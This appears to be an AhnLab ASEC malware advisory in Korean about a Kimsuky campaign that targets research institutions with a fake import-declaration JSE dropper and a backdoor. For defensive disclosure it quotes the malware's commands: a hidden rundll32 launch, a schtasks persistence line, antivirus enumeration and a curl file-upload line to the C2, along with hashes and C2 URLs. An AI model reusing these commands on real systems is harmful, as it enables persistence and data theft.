AhnLab Security Emergency response Center(ASEC)은 최근 Kimsuky 공격 그룹에 의해 수입 신고서를 위장한 악성 JSE 파일이 국내 연구 기관을 대상으로 유포되고 있음을 확인하였다. 공격자는 최종적으로 백도어를 활용하여 정보 탈취 및 명령을 수행한다.
수입 신고서를 위장한 드롭퍼 파일명은 아래와 같다.
- 수입신고서_날인.jse
파일 내부에는 난독화 된 파워쉘 스크립트, Base64 인코딩된 백도어 파일 및 정상 PDF가 존재한다.
파워쉘 스크립트에 의해 ‘수입신고서.PDF’ 파일명으로 정상 PDF가 저장되어 자동 실행되며, 파일 내부에는 공격 대상의 정보가 포함되어 있다. 정상 PDF를 생성 및 실행함으로써 사용자들에게 악성의 백도어 파일이 실행되고 있음을 인지하기 어렵게 하는 것으로 추정된다.
백그라운드에서는 %ProgramData% 경로에 ‘vuVvMKg.i3IO’의 파일명으로 백도어를 생성하고, rundll32.exe를 활용하여 악성코드를 실행시킨다.
- powershell.exe -windowstyle hidden rundll32.exe ProgramData\\vuVuMKg.i3IO UpdateSystem
실행된 악성코드는 지속성 유지를 위해 %ProgramData%경로와 %Public%경로에 ‘IconCache.db’의 파일명으로 복사 후, 작업 스케줄 등록을 수행한다.
- cmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:\Programdata\IconCache.db UpdateSystem /sc onlogon /rl highest /f
백도어는 시스템 정보 탈취를 위해 wmic 명령어를 통해 공격 대상의 AntiVirus 상태를 확인하고, ipconfig 명령어를 통해 네트워크 정보를 수집한다.
- cmd.exe /U /c wimc /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt
- ipconfig /all
이 후에는 Host Name, User Name, OS 정보 등의 정보를 수집하고 탐지를 피하기 위해 명령 수행 결과를 인코딩하여 C2로 전송한다.
또한, 시스템 정보 탈취를 포함한 아래의 명령어를 수행하여 피해 시스템에서 백도어로서의 역할을 수행하고, curl 도구를 활용하여 C2서버로의 업로드 기능까지 수행한다.
- getinfo : 시스템 정보
- die : 종료
- where : 실행 경로
- run : 특정 파일 및 명령어 실행
- curl -k -F “fileToUpload=@%s” -F “id=%S” %s
이처럼 일반 사용자들은 미끼 문서 파일이 함께 실행되어 자신이 악성코드에 감염되었다는 사실을 인지하지 못하는 경우가 많다. 보통 이런 유형의 악성코드들은 특정 대상을 겨냥하여 공격이 이루어지기 때문에 출처가 불분명한 메일의 첨부 파일을 실행하지 않도록 주의가 필요하다.
[파일 진단]
- Dropper/JS.Generic (2023.11.16.02)
- Backdoor/Win.Nikidoor (2023.11.15.03)
[IOC]
- MD5
d2335df6d17fc7c2a5d0583423e39ff8
d6abeeb469e2417bbcd3c122c06ba099 - C2
hxxp://rscnode.dothome.co[.]kr/index.php
hxxp://rscnode.dothome.co[.]kr/upload.php
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] 공개된 “수입 신고서를 위장하여 국내 연구 기관을 노리는 Kimsuky” [2] 포스팅에서 다룬 백도어 악성코드와 […]
[…] “수입 신고서를 위장하여 국내 연구 기관을 노리는 Kimsuky” [4] 게시글에서 언급한 Kimsuky 그룹의 백도어 악성코드로서 AppleSeed, Endoor 등 […]